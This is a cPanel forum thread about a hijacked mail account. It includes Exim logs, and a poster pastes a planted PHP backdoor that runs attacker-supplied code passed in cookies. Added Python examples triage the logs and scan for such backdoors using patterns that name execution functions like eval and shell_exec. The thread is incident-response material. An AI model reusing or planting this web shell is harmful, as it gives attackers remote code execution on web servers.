Bounced Email with Password in Plain Text

jimhermann

Well-Known Member
Jan 20, 2008
Folks,

I received a bounced email that contained the account email address and password in Plain Text.

Did the Sender hack the account password and send themselves an email with the email address and password?

The original email came from my account: [email protected]
However, the IP Address was in Poland and the To Address was in Russian.

2020-12-16 13:42:01 1kpcgS-0000lp-Si <= [email protected] H=(127.0.0.1) [213.92.204.4]:36457 P=esmtpsa X=TLS1.2:ECDHE-RSA-AES256-GCM-SHA384:256 CV=no A=dovecot_plain:[email protected] S=476 T="invoice for NL3252324" for [email protected]
2020-12-16 13:42:01 1kpcgS-0000lp-Si SMTP connection outbound 1608147721 1kpcgS-0000lp-Si domainname.com info1big@supportwebarh.info
2020-12-16 13:44:08 1kpcgS-0000lp-Si H=supportwebarh.info [178.132.201.122] Connection timed out

The original email contained:

Return-path: <[email protected]>
Received: from [213.92.204.4] (port=36457 helo=127.0.0.1)
by host3.uuserver.net with esmtpsa (TLS1.2) tls TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
(Exim 4.93)
(envelope-from <[email protected]>)
id 1kpcgS-0000lp-Si
for [email protected]; Wed, 16 Dec 2020 13:42:01 -0600
X-mailer: Apple Mail (2.3273)
Subject: invoice for NL3252324
Date: Wed, 16 Dec 2020 20:42:03 +0100

[email protected]:[email protected]:PASSWORD:mail.domainname.com:465

I did not find any additional activity for IP Address 213.92.204.4 or domain name supportwebarh.info

Thanks,

Jim
 
Last edited by a moderator:
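The Exim log lines quoted above carry the two indicators that matter for this kind of incident: the message was accepted over authenticated submission (P=esmtpsa with A=dovecot_plain:...) from an address the account owner never uses, and the client introduced itself with HELO 127.0.0.1 while actually connecting from 213.92.204.4. The following Python is an added example (not code from the thread or from cPanel) that parses Exim "<=" arrival lines and flags authenticated submissions with those two properties. The addresses user@domainname.com and 203.0.113.7, the trusted-network list, and the "weekly report" line are placeholders and constructed sample data; only the 1kpcgS-0000lp-Si lines mirror the log quoted in the post.

```python
import re
import ipaddress
from dataclasses import dataclass
from typing import Optional

# Constructed sample of an Exim main log. The first line is a made-up normal
# submission from the owner's usual network (203.0.113.7, a documentation
# address); the remaining lines follow the entries quoted in the thread with
# placeholder mailbox names.
SAMPLE_LOG = """\
2020-12-16 09:10:22 1kpZ3a-0000aa-Qx <= user@domainname.com H=(laptop.lan) [203.0.113.7]:51234 P=esmtpsa X=TLS1.2:ECDHE-RSA-AES256-GCM-SHA384:256 CV=no A=dovecot_plain:user@domainname.com S=1024 T="weekly report" for colleague@example.net
2020-12-16 13:42:01 1kpcgS-0000lp-Si <= user@domainname.com H=(127.0.0.1) [213.92.204.4]:36457 P=esmtpsa X=TLS1.2:ECDHE-RSA-AES256-GCM-SHA384:256 CV=no A=dovecot_plain:user@domainname.com S=476 T="invoice for NL3252324" for info1big@supportwebarh.info
2020-12-16 13:42:01 1kpcgS-0000lp-Si SMTP connection outbound 1608147721 1kpcgS-0000lp-Si domainname.com info1big@supportwebarh.info
2020-12-16 13:44:08 1kpcgS-0000lp-Si H=supportwebarh.info [178.132.201.122] Connection timed out
"""


@dataclass
class Arrival:
    msgid: str
    sender: str
    helo: str          # the H= field before the bracketed address, e.g. "(127.0.0.1)"
    ip: str            # the address Exim actually saw the connection come from
    proto: str         # P= field: esmtpsa = ESMTP over TLS with SMTP AUTH
    auth_user: Optional[str]   # A=<method>:<user>, None for unauthenticated mail
    subject: str
    recipients: str


ARRIVAL_RE = re.compile(r'^\S+ \S+ (?P<id>\S+) <= (?P<sender>\S+) (?P<rest>.*)$')


def parse_arrival(line: str) -> Optional[Arrival]:
    """Parse one Exim '<=' (message arrival) line; every other line type returns None."""
    m = ARRIVAL_RE.match(line)
    if not m:
        return None
    rest = m.group('rest')
    host = re.search(r'H=(.+?) \[([0-9a-fA-F.:]+)\]:\d+', rest)
    proto = re.search(r'\bP=(\S+)', rest)
    if not (host and proto):
        return None
    auth = re.search(r'\bA=[^:\s]+:(\S+)', rest)
    subj = re.search(r'\bT="([^"]*)"', rest)
    # The recipient list is the text after the LAST " for "; the subject itself
    # may contain the word "for" (it does in the quoted log line).
    rcpt = rest.rsplit(' for ', 1)[1] if ' for ' in rest else ''
    return Arrival(
        msgid=m.group('id'), sender=m.group('sender'),
        helo=host.group(1), ip=host.group(2), proto=proto.group(1),
        auth_user=auth.group(1) if auth else None,
        subject=subj.group(1) if subj else '',
        recipients=rcpt,
    )


def triage(log_text: str, trusted_networks) -> list:
    """Return (msgid, auth_user, reasons) for authenticated submissions that look hijacked.

    trusted_networks: CIDR strings for networks the mailbox owners normally send from
    (an assumption the operator supplies; there is no such list in the thread).
    """
    trusted = [ipaddress.ip_network(n) for n in trusted_networks]
    findings = []
    for line in log_text.splitlines():
        ev = parse_arrival(line)
        if ev is None or ev.auth_user is None:
            continue  # only SMTP-AUTH submissions can mean "someone used our credentials"
        addr = ipaddress.ip_address(ev.ip)
        reasons = []
        if not any(addr in net for net in trusted):
            reasons.append(f'auth as {ev.auth_user} from untrusted address {ev.ip}')
        # A HELO of 127.0.0.1/localhost from a remote address is a common fingerprint
        # of bulk-mailing tools that do not bother to set a real hostname.
        if ev.helo.strip('()[]') in ('127.0.0.1', 'localhost'):
            reasons.append(f'HELO {ev.helo} does not match connecting address {ev.ip}')
        if reasons:
            findings.append((ev.msgid, ev.auth_user, reasons))
    return findings


if __name__ == '__main__':
    for msgid, user, reasons in triage(SAMPLE_LOG, ['203.0.113.0/24']):
        print(msgid, user)
        for r in reasons:
            print('  -', r)
```

Run it against /var/log/exim_mainlog (the cPanel location) instead of SAMPLE_LOG to get the same triage over real traffic; the set of source addresses per authenticated user is the first thing to look at after a credential-stuffing hit, since the password was valid and nothing in the TLS or AUTH fields will look wrong.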

cPRex

Jurassic Moderator
Staff member
Oct 19, 2014
cPanel Access Level
Root Administrator
Hey there! Sorry to hear about this, and as you suspect, it seems like some type of compromise as cPanel never stores the passwords in plain text anywhere on the system. You'll want to have an admin review the security of the system, change the user and email passwords, and also possibly have any users with access to that cPanel account or email address scan their personal machines to ensure there is no malware present on those systems.
 

jimhermann

Well-Known Member
Jan 20, 2008
The compromised email address was never used as a username for other sites.

It appears that the encrypted password was hacked from a commercial site back in 2017. They must have been running a program to decipher the password since then.

They must have connected the email address for [email protected] with [email protected]. The passwords were the same.

I changed all the passwords and found one suspect PHP script: index547c5a.php

<?php
// Probe: a POST containing check_it_script makes the file answer "it true work",
// which lets whoever planted it confirm the file is still reachable.
if(isset($_POST['check_it_script'])){echo 'it true work'; exit();}
// Trigger: fires only when the request carries exactly 31 cookies and one of them equals "array31".
// Cookies 13 and 46 are joined into a function name, that function decodes cookie 54 into a second
// function name, which is called with cookie 68 and the decoded cookie 23; whatever it returns is then
// invoked. The file contains no eval() or encoded payload: all of the code arrives in the cookies.
if(isset($_COOKIE)){$p=$_COOKIE;(count($p)==31&&in_array(gettype($p).count($p),$p))?(($p[13]=$p[13].$p[46])&&($p[54]=$p[13]($p[54]))&&($p=$p[54]($p[68],$p[13]($p[23])))&&$p()):$p;}
?>

I don't know what this code does.

Any ideas?

Jim
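The script above is hard to catch with a keyword search because it never names eval(), base64_decode() or any other function: the function names are assembled at runtime from cookie values. What a file scan can still see is the shape of the code, namely a superglobal copied into a scalar and then array elements being called as functions. The following Python is an added example (not from the thread or from cPanel) of a small heuristic scanner built around those shapes. SUSPECT is the script Jim posted; BENIGN is a constructed harmless file for contrast; the rule list and the scoring in is_suspicious() are my own heuristics and will need tuning on a real docroot, and scan_tree() assumes it is pointed at a directory path you supply.

```python
import os
import re

# The suspect file quoted in the thread (index547c5a.php).
SUSPECT = r'''<?php
if(isset($_POST['check_it_script'])){echo 'it true work'; exit();}
if(isset($_COOKIE)){$p=$_COOKIE;(count($p)==31&&in_array(gettype($p).count($p),$p))?(($p[13]=$p[13].$p[46])&&($p[54]=$p[13]($p[54]))&&($p=$p[54]($p[68],$p[13]($p[23])))&&$p()):$p;}
?>'''

# Constructed benign script: reads a cookie but never executes anything derived from it.
BENIGN = r'''<?php
$name = isset($_COOKIE['lang']) ? $_COOKIE['lang'] : 'en';
echo htmlspecialchars($name, ENT_QUOTES, 'UTF-8');
?>'''

SUPERGLOBALS = r'\$_(?:COOKIE|POST|GET|REQUEST|SERVER)'

# (rule name, pattern). Each rule is a heuristic, not a proof of malice.
RULES = [
    # $x(...) or $x[...](...): a variable used as a function name
    ('variable-function call', re.compile(r'\$\w+(?:\[[^\]]*\])?\s*\(')),
    # $p=$_COOKIE; -- an entire request superglobal captured for later use
    ('superglobal copied to scalar', re.compile(r'\$\w+\s*=\s*' + SUPERGLOBALS + r'\s*;')),
    ('code-execution primitive', re.compile(
        r'\b(?:eval|assert|create_function|system|exec|shell_exec|passthru|popen|proc_open)\s*\(')),
    ('decoder wrapper', re.compile(
        r'\b(?:base64_decode|gzinflate|gzuncompress|str_rot13|hex2bin)\s*\(')),
    # The liveness-check strings present in the file from the thread.
    ('self-test probe string', re.compile(r'check_it_script|it true work')),
]


def scan_php(source: str) -> dict:
    """Return {rule_name: [matched snippets]} for every rule that fires on the source."""
    hits = {}
    for name, rx in RULES:
        found = [m.group(0) for m in rx.finditer(source)]
        if found:
            hits[name] = found
    return hits


def is_suspicious(source: str) -> bool:
    """Heuristic verdict: request data reaching a variable-function call, or two independent indicators."""
    hits = scan_php(source)
    if 'variable-function call' in hits and 'superglobal copied to scalar' in hits:
        return True
    return len(hits) >= 2


def scan_tree(root: str) -> dict:
    """Walk a document root and return {path: hits} for PHP files that trip the heuristics."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if fn.endswith(('.php', '.phtml', '.php5')):
                path = os.path.join(dirpath, fn)
                with open(path, encoding='utf-8', errors='replace') as fh:
                    src = fh.read()
                if is_suspicious(src):
                    report[path] = scan_php(src)
    return report


if __name__ == '__main__':
    for label, src in (('index547c5a.php', SUSPECT), ('benign.php', BENIGN)):
        print(label, '->', 'SUSPICIOUS' if is_suspicious(src) else 'ok', scan_php(src))
```

The variable-function rule will also fire on legitimate callback code, so treat the output as a review queue rather than a verdict; a file's modification time and its absence from the CMS's own manifest are the usual next checks.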
 

cPRex

Jurassic Moderator
Staff member
Oct 19, 2014
cPanel Access Level
Root Administrator
It definitely looks suspicious with the cookie values and the name "check_it_script", but I'm not a PHP developer so I'm not 100% certain on what that is trying to achieve. It definitely seems like you've found the root of the issue though.